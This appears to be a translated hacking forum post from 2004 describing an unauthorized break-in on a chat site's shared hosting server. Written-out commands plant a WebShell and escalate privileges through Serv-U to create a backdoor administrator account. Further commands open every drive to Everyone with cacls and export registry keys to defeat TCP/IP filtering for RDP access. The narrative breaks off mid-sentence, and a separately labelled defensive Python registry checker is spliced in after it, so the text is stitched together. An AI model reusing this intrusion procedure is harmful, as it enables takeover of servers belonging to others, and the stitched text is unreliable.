From WebShell upload, through TCP/IP filtering, to a 3389 terminal login: lvhuana

xiaoxiao2021-03-06  44

Date: 2004.12.11  Author: lvhuana

1: Getting a WebShell

A little test this evening. Because I'm too much of a newbie and don't really know how, this is all I can manage ......... There's no way to make up for what I've skipped over, so I hope you will understand this little post. Today was another boring day, and at night I was still bored, so I went to a video chat site to watch a show, hehe~ Suddenly I discovered a really popular chat room: the head count was 500 (full), and after refreshing N times I still couldn't get in .......... Even more depressing! :( I thought, since I have nothing to do, let's test how secure the host is, heh heh (being this much of a newbie, saying "test someone's security" is really flattering myself). Ping from CMD to get the other side's IP, then go to http://whois.Webhosting.info/ and look up the other sites on that IP. Ha, this time there were dozens of sites, so I estimated I could still find one or two vulnerable ones. Searching, I finally found a page with the classic upload vulnerability, http://www.xxx.net/upfile_soft.asp, and first uploaded a WebShell (Haoyang 2005 official version) (how I uploaded it I won't go into; upload tools are everywhere now).

2: Escalating privileges successfully and creating a user

Got the WebShell, happily logged in, and suddenly found I had hardly any permissions: I could only move around in the directory I was in (the C, D, E, F drives couldn't be browsed), and I didn't even have permission to delete files. Depressing ...... Back in 〖Server〗 to look at the host, I found it was running Terminal Services and the Serv-U service. Ha, this is the opening ^_^. I scanned his IP with SuperScan and saw from the banner that he was running Serv-U version 5.0.

Over to 〖wscript.shell〗 to try whether CMD commands can be executed. I entered net user through wscript.shell and it returned the other side's user list. Haha, this is good, I can do this!! Uploaded the Serv-U privilege escalation tool to the directory D:\A004\TGGTWE\****.com\uploadsoft, renamed it test.exe, then went back to 〖wscript.shell〗 to execute commands. Hehe, a fat chicken is about to fall into my hands, exciting~ Commands executed with WScript.Shell:

    d:\a004\tggtwe\****.com\uploadsoft\test.exe "net user guest /active:yes"   # activate the Guest account, I like to use this account
    d:\a004\tggtwe\****.com\uploadsoft\test.exe "net user guest lvhuana"   # set the Guest account's password to lvhuana
    d:\a004\tggtwe\****.com\uploadsoft\test.exe "net localgroup administrators guest /add"   # raise Guest to Administrator rights

With the account set up, run net localgroup administrators to check; the echo showed it was added successfully.

Then running netstat -an, I saw his open terminal port was the default 3389. OK, try connecting~

3: Getting past the TCP/IP filtering

Connect!? Dizzy ........... I pulled out SuperScan to scan his 3389 and couldn't scan it at all ...... (a firewall is up!? Damn, my luck ......). Nothing else for it, back to WScript.shell again to execute CMD commands:

    d:\a004\tggtwe\****.com\uploadsoft\test.exe "cacls.exe c: /e /t /g everyone:f"   # set the C drive so Everyone can browse it
    d:\a004\tggtwe\****.com\uploadsoft\test.exe "cacls.exe d: /e /t /g everyone:f"   # set the D drive so Everyone can browse it
    d:\a004\tggtwe\****.com\uploadsoft\test.exe "cacls.exe e: /e /t /g everyone:f"   # set the E drive so Everyone can browse it
    d:\a004\tggtwe\****.com\uploadsoft\test.exe "cacls.exe f: /e /t /g everyone:f"   # set the F drive so Everyone can browse it

At least now the whole hard drive can be traversed. I went all round the hard disk and didn't find any firewall files, so I was fairly sure: he must be using TCP/IP filtering! (Of course, there is also the possibility that the server sits on an internal network; you can tell from ipconfig -all.) We can break through TCP/IP filtering by changing his registry: what we have to do is export three of his registry keys, change them, and import them back. Back to 〖wscript.shell〗 to execute CMD commands:

    d:\a004\tggtwe\****.com\uploadsoft\test.exe "regedit -e d:\a004\tggtwe\****.com\uploadsoft\1.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip"   # export the first place in the registry concerning TCP/IP filtering
    d:\a004\tggtwe\****.com\uploadsoft\test.exe "regedit -e d:\a004\tggtwe\****.com\uploadsoft\2.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip"   # export the second place in the registry concerning TCP/IP filtering
    d:\a004\tggtwe\****.com\uploadsoft\test.exe "regedit -e d:\a004\tggtwe\****.com\uploadsoft\3.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip"   # export the third place in the registry concerning TCP/IP filtering

Then back in 〖stream〗 or 〖FSO〗 I found 1.reg, 2.reg, 3.reg quietly lying there, hehe~ Download 1.reg, 2.reg, 3.reg back to your own hard drive and change the TCP/IP filtering: first open 1.reg and find "EnableSecurityFilters" =
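As an added defensive example (not part of the original post), here is a Python check that parses two regedit -e exports of the Tcpip key and reports when TCP/IP filtering has been switched off or a TCP port added to the allow list, which is exactly the kind of change to EnableSecurityFilters the post is about to make. Both exports are constructed samples and the interface GUID is a placeholder; the value names EnableSecurityFilters and TCPAllowedPorts under Tcpip\Parameters are the Windows 2000/2003 ones.

```python
# Constructed sample exports (not real data). BASELINE has filtering on and
# only TCP 80 allowed; TAMPERED is the same key after the filter flag was
# cleared and 3389 was appended to the allow list (REG_MULTI_SZ = hex(7), UTF-16LE).
BASELINE = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters]
"EnableSecurityFilters"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{IFACE-GUID}]
"TCPAllowedPorts"=hex(7):38,00,30,00,00,00,00,00
"""
TAMPERED = BASELINE.replace("dword:00000001", "dword:00000000").replace(
    "hex(7):38,00,30,00,00,00,00,00",
    "hex(7):38,00,30,00,00,00,33,00,33,00,38,00,39,00,00,00,00,00")

def parse_reg(text):
    """{key: {value_name: raw_data}} from a v5 .reg export (single-line values only)."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
        elif current is not None and line.startswith('"') and "=" in line:
            name, raw = line.split("=", 1)
            keys[current][name.strip('"')] = raw
    return keys

def decode(raw):
    """Decode dword and hex(7) (REG_MULTI_SZ) data; other types are returned as text."""
    if raw.startswith("dword:"):
        return int(raw[6:], 16)
    if raw.startswith("hex(7):"):
        data = bytes(int(b, 16) for b in raw[7:].split(",") if b)
        return [s for s in data.decode("utf-16-le").split("\x00") if s]
    return raw.strip('"')

def filter_state(text):
    """Summarise TCP/IP filtering: the enabled flag and allowed TCP ports per interface."""
    state = {"enabled": None, "tcp_ports": {}}
    for key, values in parse_reg(text).items():
        low = key.lower()
        if low.endswith("\\tcpip\\parameters") and "EnableSecurityFilters" in values:
            state["enabled"] = decode(values["EnableSecurityFilters"]) == 1
        elif "\\interfaces\\" in low and "TCPAllowedPorts" in values:
            state["tcp_ports"][key.rsplit("\\", 1)[1]] = decode(values["TCPAllowedPorts"])
    return state

def compare(baseline_text, current_text):
    """Findings where the current export is weaker than the baseline (empty if unchanged)."""
    base, cur, findings = filter_state(baseline_text), filter_state(current_text), []
    if base["enabled"] and not cur["enabled"]:
        findings.append("EnableSecurityFilters changed from 1 to 0 (TCP/IP filtering switched off)")
    for iface, ports in cur["tcp_ports"].items():
        added = sorted(set(ports) - set(base["tcp_ports"].get(iface, [])), key=int)
        if added:
            findings.append(f"{iface}: TCPAllowedPorts gained {', '.join(added)}")
    return findings
```

Run compare() against a known-good export of each ControlSet (the post exports three) to catch exactly this kind of tampering during a review of a host.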

When reposting, please cite the original URL: https://www.9cbs.com/read-58691.html
